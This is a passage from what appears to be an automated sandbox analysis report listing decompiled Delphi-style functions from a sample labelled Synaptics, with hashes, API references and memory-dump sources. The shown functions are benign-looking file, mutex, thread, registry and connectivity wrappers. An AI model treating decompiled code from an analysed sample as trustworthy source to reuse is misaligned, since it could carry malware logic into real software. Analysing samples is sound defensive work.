                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92a936b21cd9d94937c526833fb5441d460329d379bcf8ed0327f68837e686ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0D8B178830155F22512644CC7BBA62494780704F10423636A0AA3E3DAEED44502DE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004099A0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099A0(void* __eax, long __edx, long _a4, long _a8) {
				long _v8;
				long _v12;
				long _t15;

				_v12 = _a4;
				_v8 = _a8;
				_t15 = SetFilePointer(__eax, _v12,  &_v8, __edx); // executed
				_v12 = _t15;
				return _v12;
			}






                                                                                                                                                                                                                            0x004099af
                                                                                                                                                                                                                            0x004099b5
                                                                                                                                                                                                                            0x004099c2
                                                                                                                                                                                                                            0x004099c7
                                                                                                                                                                                                                            0x004099d5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,?,?), ref: 004099C2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                            • Opcode ID: f29a9477991f3e7b9ebd474ae451ced9d60668962b91a1e80dbdca32ee1dd72a
                                                                                                                                                                                                                            • Instruction ID: 27054813932fb3ab48487c389183e9186cf915fff140bcd813d5bc2f2b41f103
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29a9477991f3e7b9ebd474ae451ced9d60668962b91a1e80dbdca32ee1dd72a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EE0757691521CBF9B40DED8D881DDEB7FCEB48220F204166F958E3341E631AF409795
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00425A84 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
				int _t9;
				int _t13;
				void* _t14;
				intOrPtr _t17;

				_t14 = __eax;
				_t17 =  *0x425ac4; // 0x3
				E00425D3C(__eax, __ecx, _t17);
				 *__ecx = 0;
				__ecx->cy = 0;
				_t9 = E00404C80(__edx);
				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
				return _t13;
			}







                                                                                                                                                                                                                            0x00425a8b
                                                                                                                                                                                                                            0x00425a8d
                                                                                                                                                                                                                            0x00425a95
                                                                                                                                                                                                                            0x00425a9c
                                                                                                                                                                                                                            0x00425aa0
                                                                                                                                                                                                                            0x00425aa6
                                                                                                                                                                                                                            0x00425ab8
                                                                                                                                                                                                                            0x00425ac0

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExtentPoint32Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 223599850-0
                                                                                                                                                                                                                            • Opcode ID: efb2d78b2ad38a5a788e7adebc90b34ed57604606a9e4e9179171ca3c6b050d1
                                                                                                                                                                                                                            • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efb2d78b2ad38a5a788e7adebc90b34ed57604606a9e4e9179171ca3c6b050d1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405F94 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405F94(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E004061D0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                                                                                                                                                                                                            0x00405f9c
                                                                                                                                                                                                                            0x00405fa2
                                                                                                                                                                                                                            0x00405fae
                                                                                                                                                                                                                            0x00405fb2
                                                                                                                                                                                                                            0x00405fbb
                                                                                                                                                                                                                            0x00405fc0
                                                                                                                                                                                                                            0x00405fc2
                                                                                                                                                                                                                            0x00405fc7
                                                                                                                                                                                                                            0x00405fc9
                                                                                                                                                                                                                            0x00405fcc
                                                                                                                                                                                                                            0x00405fcc
                                                                                                                                                                                                                            0x00405fc7
                                                                                                                                                                                                                            0x00405fcf
                                                                                                                                                                                                                            0x00405fda

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                                                                                                                                                                                              • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC,?,00405FC0,00400000,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0049B0CC), ref: 00406228
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                                                                                                            • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409946 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00409946(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = ReadFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                                                                                                                                            0x0040994b
                                                                                                                                                                                                                            0x0040995c
                                                                                                                                                                                                                            0x00409963
                                                                                                                                                                                                                            0x00409965
                                                                                                                                                                                                                            0x00409965
                                                                                                                                                                                                                            0x00409973

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040995C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                            • Opcode ID: 0ea5086fdbfedb143330102f1be83158ca82df5f712f5050f700139e4d13b18c
                                                                                                                                                                                                                            • Instruction ID: 034859a524ad8c4371d054bc92d4e9d9950720554d01ce651a0ef640c3dbcfab
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea5086fdbfedb143330102f1be83158ca82df5f712f5050f700139e4d13b18c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4D012B23081107AE220956A5C44DB76ADCCBC9770F10063EB698D62C1E6208C018275
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409974 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00409974(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                                                                                                                                                                                            0x00409977
                                                                                                                                                                                                                            0x00409988
                                                                                                                                                                                                                            0x0040998f
                                                                                                                                                                                                                            0x00409991
                                                                                                                                                                                                                            0x00409991
                                                                                                                                                                                                                            0x0040999f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                            • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                                                            • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00478230 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 21%
                                                                                                                                                                                                                            			E00478230(void* __eax, void* __ecx, void* __edx, void* __ebp) {
				char _v24;
				void* __ebx;
				void* __esi;
				void* _t15;
				void* _t16;

				E004781D4(__eax, __eax, __ecx, _t15, __edx, _t16); // executed
				_push(E004065AC(__edx));
				_push(E00478268);
				_push(5);
				_push(0);
				_push( &_v24); // executed
				L00417E04(); // executed
				return E004781BC( &_v24, _t15, _t16);
			}








                                                                                                                                                                                                                            0x0047823d
                                                                                                                                                                                                                            0x00478249
                                                                                                                                                                                                                            0x0047824a
                                                                                                                                                                                                                            0x0047824f
                                                                                                                                                                                                                            0x00478251
                                                                                                                                                                                                                            0x00478257
                                                                                                                                                                                                                            0x00478258
                                                                                                                                                                                                                            0x00478267

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004781D4: 741EBC30.OLE32(00000000,?,00000000,00478221,?,?,Excel.Application,00000000,?,00478242), ref: 00478201
                                                                                                                                                                                                                            • 7426B690.OLE32(00000000,00000000,00000005,00478268,00000000), ref: 00478258
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7426B690
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3899874126-0
                                                                                                                                                                                                                            • Opcode ID: 785669ee39f9c79f4717ff3d995cc01253c4d274ddd2fb4442236d13fad275cd
                                                                                                                                                                                                                            • Instruction ID: f8e174c70090632150d231ab812d8d7e42eb955a1dbdae64a2f8568beb472c63
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 785669ee39f9c79f4717ff3d995cc01253c4d274ddd2fb4442236d13fad275cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFD05B717847102BD600F56D0C47BD7318C8B45729F5445BE7518D72C3FE6D8D1542EA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00498248 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00498248(void* __eax, void* __ecx) {
				void* _t4;
				DWORD* _t8;

				 *0x49f1dc = E00441704(__eax);
				_t4 = CreateThread(0, 0, E00497CF0, 0, 0, _t8); // executed
				return _t4;
			}





                                                                                                                                                                                                                            0x00498253
                                                                                                                                                                                                                            0x00498266
                                                                                                                                                                                                                            0x0049826d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                                                                                                            • Opcode ID: cbb4e7eea467e225b00a60faa0712dba27865e89d4f5a63d4fcb6e00c7bf2234
                                                                                                                                                                                                                            • Instruction ID: d20cfee4eb2c6f302c38dd3c40418a867a3644e10e3952504ee4e450d92dbdcf
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbb4e7eea467e225b00a60faa0712dba27865e89d4f5a63d4fcb6e00c7bf2234
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81C08CB03E83007EF610A7A6AD83F2529888344F25F30003BF606ED1C3C8E92C48062C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409A58 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A58(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                                                                                                                                                                                            0x00409a63
                                                                                                                                                                                                                            0x00409a6b
                                                                                                                                                                                                                            0x00409a74
                                                                                                                                                                                                                            0x00409a75
                                                                                                                                                                                                                            0x00409a78
                                                                                                                                                                                                                            0x00409a78

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00496E89,00000000,00496FE6), ref: 00409A63
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                                                            • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406F90 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                                                                                                                                                                                            0x00406f93
                                                                                                                                                                                                                            0x00406f9b
                                                                                                                                                                                                                            0x00406fa6
                                                                                                                                                                                                                            0x00406fac

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(?,004742AD,004742AC,?,00474274,00000000,000000FF,00000000,00000000,004742AC), ref: 00406FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                                                                                                                            • Instruction ID: 3e008c22956fc280003415e3679d606a6b79cccc06a071e67c7aa2054a22c523
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96C0127315024DAFCB00EEA9DC05D9B33DC5728609B408425B929C7100C139E5508B60
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040991C Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040991C(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                                                                                                                                                                                            0x00409939
                                                                                                                                                                                                                            0x0040993f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,00000000,00418E54,00000001), ref: 00409939
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                            • Opcode ID: 3718bbfb348df6028dd1a44cfef27654aa8cd2aa527b65812a7650234bf554c1
                                                                                                                                                                                                                            • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3718bbfb348df6028dd1a44cfef27654aa8cd2aa527b65812a7650234bf554c1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474D34 Relevance: 1.5, APIs: 1, Instructions: 12networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00474D34(void* __ecx) {
				long _v4;
				int _t4;

				_v4 = 0;
				_t4 = InternetGetConnectedState( &_v4, 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}





                                                                                                                                                                                                                            0x00474d37
                                                                                                                                                                                                                            0x00474d41
                                                                                                                                                                                                                            0x00474d49
                                                                                                                                                                                                                            0x00474d4d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InternetGetConnectedState.WININET(?,00000000), ref: 00474D41
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConnectedInternetState
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 97057780-0
                                                                                                                                                                                                                            • Opcode ID: a7ed79bf9b14b00b121dfe9b039b901474b7428766eb3fab445e489e84394f62
